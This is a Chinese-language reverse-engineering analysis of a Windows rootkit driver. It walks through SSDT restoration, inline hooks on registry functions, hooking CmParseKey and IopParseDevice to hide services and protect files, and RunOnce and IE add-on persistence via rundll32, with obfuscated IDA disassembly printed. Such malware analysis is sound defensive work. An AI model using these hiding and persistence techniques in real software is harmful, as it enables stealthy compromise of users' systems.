第一部分:猥缩的驱动
技术亮点:
1、得到“处女之身”,(在女人心中第1个男人永远会记得),主要目的是为了使自己挂钩原始的东西,sub_148a8()获取ntoskrnl的文件地址(ZwQuerySystemInformation),sub_11c78将ntoskrnl文件映身入内存,sub_136b6()找到原始SSDT偏移,sub_11338()手动重定位从而找到原始地址。具体实现可以看一下。原始的SSDT的函数地址。
2、大玩“躲猫猫”,创建服务,实施“乾坤大挪移”修改文件名,躲猫猫之对象HOOK \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVICES的ParseProcedure CmParseKey实现注册表隐藏。
IoDeviceObjctType的IopParseDevice,实现文件保护。(ObRefernceObjectByHandle)。
DriverEntry ===>
主要流程:
1、通过与"System"比较,确定进程名在PEB中的偏移(因为加载驱动时进程是System,这样做实际上是因为不同操作系统偏移位置不同)
2、解密字符串
3、获取所需的函数的地址
4、调用DriverReinitializationRoutine,开始猥缩的操作
流程4:DriverReinitializationRoutine ===>
1、测试打开"\SystemRoot"(这个应该是测试文件系统是否初始化完毕)
1-1、打开失败,使用IoRegisterDriverReinitialization从而转到1.
1-2、打开成功,进入sub_16BFE()。
流程4 ==> 流程1-2:sub_16BFE() ===>
1、解密字符串
2、获得原始SSDT,以获取原始函数的地址(内核本就是兵家必争之地,极可能不是“处女之身”了,可见作者也明白这道理)
2-1、获取失败,还是用别人搞了的函数,避免操作失败
3、sub_1132A(),调用PsSetCreateProcessNotifyRoutine注册进程回调,在回调中进行各种XX操作,回调例程为sub_108B8
4、sub_16BD2(),调用sub_1575C(),查找NtSetValueKey及NtDeleteKey中对ObReferenceObjectByHandle的调用。
4-1、如果找到则对NtSetValueKey及NtDeleteKey中对ObReferenceObjectByHandle的调用进行Inlie HOOK,Inline后分别对应调用sub_157F0()及sub_15824()
4-2、如果没找到则直接SSDT HOOK NtDeleteKey
5、sub_16AF2(),创建服务,实施“乾坤大挪移”修改文件名,对键HOOK \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVICES CmParseKey,以实现对服务的隐藏。
6、sub_10DE4(),HOOK IoDeviceObjctType的IopParseDevice,实现文件保护.
(PS,获取原始SSDT中,原始函数的地址,主要是通过读取ntoskrnl文件中原始SSDT的值)
流程4 ==> 流程1-2 ==> 流程3:回调流程sub_108B8() ===>
这个例程分别对userinit.exe、explorer.exe、rundll32.exe、iexplorer.exe进行不同的处理,实际上都是一些注册表的操作,主要是实现应用层的DLL起动,注册为IE的加载项,以便随同IE一起加载
1、case userinit: 写入\registry\machine\software\microsoft\windows\currentversion\runonce的键unfd,
对应的值为%systemroot%\system32\rundll32.exe %systemroot%\system32\zuefhm.dll,DllRegisterServer"
2、case explorer: 一些注册表查询设置操作,这里注册表操作较多,有兴趣自己可以跟一下,小弟简单列一下,有下面的这些键
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0DDF3C19-E692-22D2-AB05-11AA44BDD685}\Shell\Open\Command
\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu
\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\REGISTRY\USER\S-1-5-21-823518204-1336601894-1417001333- 500\Software\Microsoft\Internet Explorer\Main
\REGISTRY\USER\S-1-5-21-823518204-1336601894-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons \ClassicStartMenu\REGISTRY\USER\S-1-5-21-823518204-1336601894-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Explorer \HideDesktopIcons\NewStartPanel
\REGISTRY\USER\S-1-5-21-823518204-1336601894-1417001333-500\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer \REGISTRY\USER\S-1-5- 21-823518204-1336601894-1417001333-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
3、case rundll32: 判断其父进程是否是ExpLorer.exe
4、case iexplorer: 进行一些计时操作
看一下对应几次解密后分别对应如下几图:
我们再来看一下HOOK NtDeleteValueKey中对ObReferenceObjectByHandle的调用前如下图:
HOOK前查找NtSetValueKey中对ObReferenceObjectByHandle的调用前如下图:
再来看一下HOOK NtDeleteValueKey、NtSetValueKey后如下图:
看一下\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVICES的ParseProcedure CmParseKey被HOOK前:
对比下\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVICES的ParseProcedure CmParseKey被HOOK后:
再来看下代码:
看一下DriverEntry
INIT:00019380 ; NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
INIT:00019380 public DriverEntry
INIT:00019380 DriverEntry proc near
INIT:00019380
INIT:00019380 SymbolicLinkName= UNICODE_STRING ptr -14h
INIT:00019380 DestinationString= UNICODE_STRING ptr -0Ch
INIT:00019380 DeviceObject = dword ptr -4
INIT:00019380 DriverObject = dword ptr 8
INIT:00019380 RegistryPath = dword ptr 0Ch
INIT:00019380
INIT:00019380 000 push ebp
INIT:00019381 004 mov ebp, esp
INIT:00019383 004 sub esp, 14h
INIT:00019386 018 push ebx
INIT:00019387 01C push esi
INIT:00019388 020 push edi
INIT:00019389 024 push edx
INIT:0001938A 028 inc dl
INIT:0001938C 028 or dh, dl
INIT:0001938E 028 and edx, ebx
INIT:00019390 028 test ah, dh
INIT:00019392 028 and dh, 5Eh
INIT:00019395 028 pop edx
INIT:00019396 024 push [ebp+RegistryPath]
INIT:00019399 028 call sub_19260
INIT:0001939E 024 push ecx
INIT:0001939F 028 push bx
INIT:000193A1 02A test cx, cx
INIT:000193A4 02A sub cx, si
INIT:000193A7 02A mov cx, 1DD6h
INIT:000193AB 02A mov bh, 68h
INIT:000193AD 02A xor cl, bl
INIT:000193AF 02A or ecx, 3F17h
INIT:000193B5 02A and bh, dh
INIT:000193B7 02A pop bx
INIT:000193B9 028 pop ecx
INIT:000193BA 024 xor eax, eax
INIT:000193BC 024 cmp g_ImageFileNameOffset, eax
INIT:000193C2 024 jnz short loc_193DD
INIT:000193C4 024 push eax
INIT:000193C5 028 push eax
INIT:000193C6 02C call sub_192A0
INIT:000193CB 024 push eax
INIT:000193CC 028 push edx
INIT:000193CD 02C push di
INIT:000193CF 02E sub eax, 0DCCh
INIT:000193D4 02E pop di
INIT:000193D6 02C pop edx
INIT:000193D7 028 pop eax
INIT:000193D8 024 jmp loc_194A4
INIT:000193DD ; ---------------------------------------------------------------------------
INIT:000193DD
INIT:000193DD loc_193DD: ; CODE XREF: DriverEntry+42j
INIT:000193DD 024 push edi
INIT:000193DE 028 test eax, edi
INIT:000193E0 028 pop edi
INIT:000193E1 024 call near ptr DecodeAllStr
INIT:000193E6 024 pusha
INIT:000193E7 044 inc al
INIT:000193E9 044 and dl, bl
INIT:000193EB 044 or dx, ax
INIT:000193EE 044 and dx, 463Eh
INIT:000193F3 044 test dl, 63h
INIT:000193F6 044 xor ax, cx
INIT:000193F9 044 inc dl
INIT:000193FB 044 popa
INIT:000193FC 024 lea eax, [ebp+DestinationString]
INIT:000193FF 024 push offset g_device_ksdrv ; SourceString
INIT:00019404 028 push eax ; DestinationString
INIT:00019405 02C call ds:RtlInitUnicodeString
INIT:0001940B 024 pushaw
INIT:0001940D 034 push edx
INIT:0001940E 038 test bx, 1458h
INIT:00019413 038 or ax, di
INIT:00019416 038 add bh, ch
INIT:00019418 038 test bh, al
INIT:0001941A 038 pop edx
INIT:0001941B 034 popaw
INIT:0001941D 024 lea eax, [ebp+DeviceObject]
INIT:00019420 024 xor esi, esi
INIT:00019422 024 push eax ; DeviceObject
INIT:00019423 028 push esi ; Exclusive
INIT:00019424 02C push esi ; DeviceCharacteristics
INIT:00019425 030 lea eax, [ebp+DestinationString]
INIT:00019428 030 push 8000h ; DeviceType
INIT:0001942D 034 push eax ; DeviceName
INIT:0001942E 038 push esi ; DeviceExtensionSize
INIT:0001942F 03C push [ebp+DriverObject] ; DriverObject
INIT:00019432 040 call ds:IoCreateDevice
INIT:00019438 024 cmp eax, esi
INIT:0001943A 024 jl loc_194ED
INIT:00019440 024 push ecx
INIT:00019441 028 push edx
INIT:00019442 02C push edi
INIT:00019443 030 test cx, cx
INIT:00019446 030 xor dl, 57h
INIT:00019449 030 inc edi
INIT:0001944A 030 or ch, 6Fh
INIT:0001944D 030 pop edi
INIT:0001944E 02C pop edx
INIT:0001944F 028 pop ecx
INIT:00019450 024 lea eax, [ebp+SymbolicLinkName]
INIT:00019453 024 push offset g_dosdevice_ksdrv ; SourceString
INIT:00019458 028 push eax ; DestinationString
INIT:00019459 02C call ds:RtlInitUnicodeString
INIT:0001945F 024 push ebx
INIT:00019460 028 push edx
INIT:00019461 02C mov bh, 64h
INIT:00019463 02C pop edx
INIT:00019464 028 pop ebx
INIT:00019465 024 lea eax, [ebp+DestinationString]
INIT:00019468 024 push eax ; DeviceName
INIT:00019469 028 lea eax, [ebp+SymbolicLinkName]
INIT:0001946C 028 push eax ; SymbolicLinkName
INIT:0001946D 02C call ds:IoCreateSymbolicLink
INIT:00019473 024 cmp eax, esi
INIT:00019475 024 mov [ebp+RegistryPath], eax
INIT:00019478 024 jge short loc_19485
INIT:0001947A 024 push [ebp+DeviceObject] ; DeviceObject
INIT:0001947D 028 call ds:IoDeleteDevice
INIT:00019483 024 jmp short loc_194EA
INIT:00019485 ; ---------------------------------------------------------------------------
INIT:00019485
INIT:00019485 loc_19485: ; CODE XREF: DriverEntry+F8j
INIT:00019485 024 pusha
INIT:00019486 044 inc al
INIT:00019488 044 and dl, bl
INIT:0001948A 044 or dx, ax
INIT:0001948D 044 and dx, 463Eh
INIT:00019492 044 test dl, 63h
INIT:00019495 044 xor ax, cx
INIT:00019498 044 inc dl
INIT:0001949A 044 popa
INIT:0001949B 024 call GetNeedSystemRootine
INIT:000194A0 024 test al, al
INIT:000194A2 024 jnz short loc_194AB
INIT:000194A4
INIT:000194A4 loc_194A4: ; CODE XREF: DriverEntry+58j
INIT:000194A4 024 mov eax, 0C0000001h
INIT:000194A9 024 jmp short loc_194ED
INIT:000194AB ; ---------------------------------------------------------------------------
INIT:000194AB
INIT:000194AB loc_194AB: ; CODE XREF: DriverEntry+122j
INIT:000194AB 024 push cx
INIT:000194AD 026 push edx
INIT:000194AE 02A sub dh, al
INIT:000194B0 02A add cx, dx
INIT:000194B3 02A inc cl
INIT:000194B5 02A test ah, cl
INIT:000194B7 02A inc ch
INIT:000194B9 02A or dx, bx
INIT:000194BC 02A inc cx
INIT:000194BE 02A xor dx, dx
INIT:000194C1 02A xor cl, bh
INIT:000194C3 02A pop edx
INIT:000194C4 026 pop cx
INIT:000194C6 024 mov eax, [ebp+DriverObject]
INIT:000194C9 024 mov dword ptr [eax+38h], offset sub_16CD4
INIT:000194D0 024 push ecx
INIT:000194D1 028 push edx
INIT:000194D2 02C push edi
INIT:000194D3 030 test cx, cx
INIT:000194D6 030 xor dl, 57h
INIT:000194D9 030 inc edi
INIT:000194DA 030 or ch, 6Fh
INIT:000194DD 030 pop edi
INIT:000194DE 02C pop edx
INIT:000194DF 028 pop ecx
INIT:000194E0 024 push 0 ; ULONG
INIT:000194E2 028 push 0 ; PVOID
INIT:000194E4 02C push eax ; struct _DRIVER_OBJECT *
INIT:000194E5 030 call DriverReinitializationRoutine
INIT:000194EA
INIT:000194EA loc_194EA: ; CODE XREF: DriverEntry+103j
INIT:000194EA 024 mov eax, [ebp+RegistryPath]
INIT:000194ED
INIT:000194ED loc_194ED: ; CODE XREF: DriverEntry+BAj
INIT:000194ED ; DriverEntry+129j
INIT:000194ED 024 pop edi
INIT:000194EE 020 pop esi
INIT:000194EF 01C pop ebx
INIT:000194F0 018 leave
INIT:000194F1 000 retn 8
INIT:000194F1 DriverEntry endp
.text:000108B8 ; double __stdcall sub_108B8(int ParentId, int pid, char bCreate)
.text:000108B8 sub_108B8 proc near ; DATA XREF: sub_1132A+2o
.text:000108B8
.text:000108B8 var_10 = byte ptr -10h
.text:000108B8 var_F = byte ptr -0Fh
.text:000108B8 ParentId = dword ptr 8
.text:000108B8 pid = dword ptr 0Ch
.text:000108B8 bCreate = dword ptr 10h
.text:000108B8
.text:000108B8 0 000 push ebp
.text:000108B9 0 004 mov ebp, esp
.text:000108BB 0 004 sub esp, 10h
.text:000108BE 0 014 push ebx
.text:000108BF 0 018 push esi
.text:000108C0 0 01C push edi
.text:000108C1 0 020 xor ebx, ebx
.text:000108C3 0 020 xor eax, eax
.text:000108C5 0 020 lea edi, [ebp+var_F]
.text:000108C8 0 020 mov [ebp+var_10], bl
.text:000108CB 0 020 cmp byte ptr [ebp+bCreate], bl
.text:000108CE 0 020 stosd
.text:000108CF 0 020 stosd
.text:000108D0 0 020 stosd
.text:000108D1 0 020 stosw
.text:000108D3 0 020 stosb
.text:000108D4 0 020 jz loc_10A7D
.text:000108DA 0 020 cmp [ebp+pid], 14h
.text:000108DE 0 020 jb loc_10A7D
.text:000108E4 0 020 cmp g_ImageFileNameOffset, ebx
.text:000108EA 0 020 jz loc_10A7D
.text:000108F0 0 020 lea eax, [ebp+var_10]
.text:000108F3 0 020 push eax ; char *
.text:000108F4 0 024 push [ebp+pid] ; int
.text:000108F7 0 028 call SearchProccessName
.text:000108FC 0 020 cmp eax, ebx
.text:000108FE 0 020 mov [ebp+bCreate], eax
.text:00010901 0 020 jz loc_10A7D
.text:00010907 0 020 push edx
.text:00010908 0 024 push edi
.text:00010909 0 028 or edx, edx
.text:0001090B 0 028 mov dl, ch
.text:0001090D 0 028 cmp edx, ecx
.text:0001090F 0 028 and edx, eax
.text:00010911 0 028 pop edi
.text:00010912 0 024 pop edx
.text:00010913 0 020 mov esi, ds:_stricmp
.text:00010919 0 020 lea eax, [ebp+var_10]
.text:0001091C 0 020 push offset g_userinit ; "9UT瞋#Q"
.text:00010921 0 024 push eax ; char *
.text:00010922 0 028 call esi ; _stricmp
.text:00010924 0 028 pop ecx
.text:00010925 0 024 test eax, eax
.text:00010927 0 024 pop ecx
.text:00010928 0 020 jnz short loc_10947
.text:0001092A 0 020 push eax
.text:0001092B 0 024 push bx
.text:0001092D 0 026 test ax, 826h
.text:00010931 0 026 sub bl, 12h
.text:00010934 0 026 test bx, 3C13h
.text:00010939 0 026 test ah, 56h
.text:0001093C 0 026 cmp bx, dx
.text:0001093F 0 026 pop bx
.text:00010941 0 024 pop eax
.text:00010942 0 020 call ProcessUserInit
.text:00010947
.text:00010947 loc_10947: ; CODE XREF: sub_108B8+70j
.text:00010947 0 020 push ax
.text:00010949 0 022 push cx
.text:0001094B 0 024 push edi
.text:0001094C 0 028 and al, dl
.text:0001094E 0 028 or ch, 3Ah
.text:00010951 0 028 dec edi
.text:00010952 0 028 inc edi
.text:00010953 0 028 cmp ah, bl
.text:00010955 0 028 xor ax, ax
.text:00010958 0 028 cmp cl, dl
.text:0001095A 0 028 dec cl
.text:0001095C 0 028 pop edi
.text:0001095D 0 024 pop cx
.text:0001095F 0 022 pop ax
.text:00010961 0 020 lea eax, [ebp+var_10]
.text:00010964 0 020 push offset g_explorer_exe ; ")^A琘?]\n?^T?
.text:00010969 0 024 push eax ; char *
.text:0001096A 0 028 call esi ; _stricmp
.text:0001096C 0 028 pop ecx
.text:0001096D 0 024 test eax, eax
.text:0001096F 0 024 pop ecx
.text:00010970 0 020 jnz loc_10A24
.text:00010976 0 020 cmp g_bFirstExplorer, al
.text:0001097C 0 020 jnz loc_10A24
.text:00010982 0 020 push ebx
.text:00010983 0 024 add bx, ax
.text:00010986 0 024 mov bx, 6602h
.text:0001098A
.text:0001098A loc_1098A:
.text:0001098A 0 024 and bh, dl
.text:0001098C 0 024 pop ebx
.text:0001098D 0 020 push [ebp+bCreate]
.text:00010990 0 024 call ProcessExplorer1
.text:00010995 0 020 test eax, eax
.text:00010997 0 020 jl loc_10A24
.text:0001099D 0 020 jbe loc_109B4
.text:000109A3 0 020 push eax
.text:000109A4 0 024 pop eax
.text:000109A5 0 020 ja loc_109B4
.text:000109AB 0 020 pop esi
.text:000109AC 0 01C fisubr dword ptr [ecx+7A96ED64h]
.text:000109B2 db 26h
.text:000109B2 0 01C dec esp
.text:000109B4
.text:000109B4 loc_109B4: ; CODE XREF: sub_108B8+E5j
.text:000109B4 ; sub_108B8+EDj
.text:000109B4 0 01C mov g_bFirstExplorer, 1
.text:000109BB 0 01C jbe loc_109DD
.text:000109C1 0 01C push si
.text:000109C3 0 01E mov si, 5C11h
.text:000109C7 0 01E pop si
.text:000109C9 0 01C ja loc_109DD
.text:000109C9 ; ---------------------------------------------------------------------------
.text:000109CF 0 01C unk_109CF db 70h ; p
.text:000109D0 0 01C db 0BAh ; ?
.text:000109D1 0 01C db 0Eh
.text:000109D2 0 01C dw 8D67h
.text:000109D4 0 01C dd 3557B8FDh, 0CBA2EED7h
.text:000109DC 0 01C db 0F3h
.text:000109DD ; ---------------------------------------------------------------------------
.text:000109DD
.text:000109DD loc_109DD: ; CODE XREF: sub_108B8+103j
.text:000109DD ; sub_108B8+111j
.text:000109DD 0 01C mov b_FinishRegClsid, 1
.text:000109E4 0 01C jp short loc_109FB
.text:000109E6 0 01C push edi
.text:000109E7 0 020 mov di, 0B224h
.text:000109EB 0 020 pop edi
.text:000109EC 0 01C jnp short loc_109FB
.text:000109EE 0 01C xchg eax, edx
.text:000109EF 0 01C clc
.text:000109F0 0 01C mov esi, 34A96CF4h
.text:000109F5 0 01C inc eax
.text:000109F5 ; ---------------------------------------------------------------------------
.text:000109F6 0 01C unk_109F6 db 0C5h ; ?
.text:000109F7 0 01C db 2Dh ; -
.text:000109F8 0 01C db 3Ah ; :
.text:000109F9 0 01C db 0B4h ; ?
.text:000109FA 0 01C db 17h
.text:000109FB ; ---------------------------------------------------------------------------
.text:000109FB
.text:000109FB loc_109FB: ; CODE XREF: sub_108B8+12Cj
.text:000109FB ; sub_108B8+134j
.text:000109FB 0 01C call ProcessExploerer2
.text:00010A00 0 01C pusha
.text:00010A01 0 03C test bx, 0A43h
.text:00010A06 0 03C cmp ch, 6Eh
.text:00010A09 0 03C sub ch, bl
.text:00010A0B 0 03C cmp dx, 7A98h
.text:00010A10 0 03C sub ecx, edx
.text:00010A12 0 03C popa
.text:00010A13 0 01C push dword_19178
.text:00010A19 0 020 call ProcessExploerer3
.text:00010A1E 0 01C mov esi, ds:_stricmp
.text:00010A24
.text:00010A24 loc_10A24: ; CODE XREF: sub_108B8+B8j
.text:00010A24 ; sub_108B8+C4j ...
.text:00010A24 0 01C push eax
.text:00010A25 0 020 xor ax, bx
.text:00010A28 0 020 pop eax
.text:00010A29 0 01C lea eax, [ebp+var_10]
.text:00010A2C 0 01C push offset g_aRundll32_exe ; char *
.text:00010A31 0 020 push eax ; char *
.text:00010A32 0 024 call esi ; _stricmp
.text:00010A34 0 024 pop ecx
.text:00010A35 0 020 test eax, eax
.text:00010A37 0 020 pop ecx
.text:00010A38 0 01C jnz short loc_10A4A
.text:00010A3A 0 01C cmp g_bFirstExplorer, al
.text:00010A40 0 01C jz short loc_10A4A
.text:00010A42 0 01C push [ebp+ParentId]
.text:00010A45 0 020 call ProcessRundll32
.text:00010A4A
.text:00010A4A loc_10A4A: ; CODE XREF: sub_108B8+180j
.text:00010A4A ; sub_108B8+188j
.text:00010A4A 0 01C jo short loc_10A62
.text:00010A4C 0 01C push esi
.text:00010A4D 0 020 mov esi, 387EF7E0h
.text:00010A52 0 020 pop esi
.text:00010A53 0 01C jno short loc_10A62
.text:00010A53 ; ---------------------------------------------------------------------------
.text:00010A55 0 01C byte_10A55 db 0C6h, 71h, 7Dh
.text:00010A58 0 01C dd 21D7221Dh, 0C0FF8AF7h
.text:00010A60 0 01C db 0Dh, 0A7h
.text:00010A62 ; ---------------------------------------------------------------------------
.text:00010A62
.text:00010A62 loc_10A62: ; CODE XREF: sub_108B8:loc_10A4Aj
.text:00010A62 ; sub_108B8+19Bj
.text:00010A62 0 01C lea eax, [ebp+var_10]
.text:00010A65 0 01C push offset g_aIEXPLORE_EXE ; char *
.text:00010A6A 0 020 push eax ; char *
.text:00010A6B 0 024 call esi ; _stricmp
.text:00010A6D 0 024 pop ecx
.text:00010A6E 0 020 test eax, eax
.text:00010A70 0 020 pop ecx
.text:00010A71 0 01C jnz short loc_10A7D
.text:00010A73 0 01C push offset dword_19170
.text:00010A78 0 020 call ProcessIexplorer
.text:00010A7D
.text:00010A7D loc_10A7D: ; CODE XREF: sub_108B8+1Cj
.text:00010A7D ; sub_108B8+26j ...
.text:00010A7D 0 01C pop edi
.text:00010A7E 0 018 pop esi
.text:00010A7F 0 014 pop ebx
.text:00010A80 0 010 leave
.text:00010A81 0 000 retn 0Ch
.text:00010A81 sub_108B8 endp ; sp-analysis failed
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)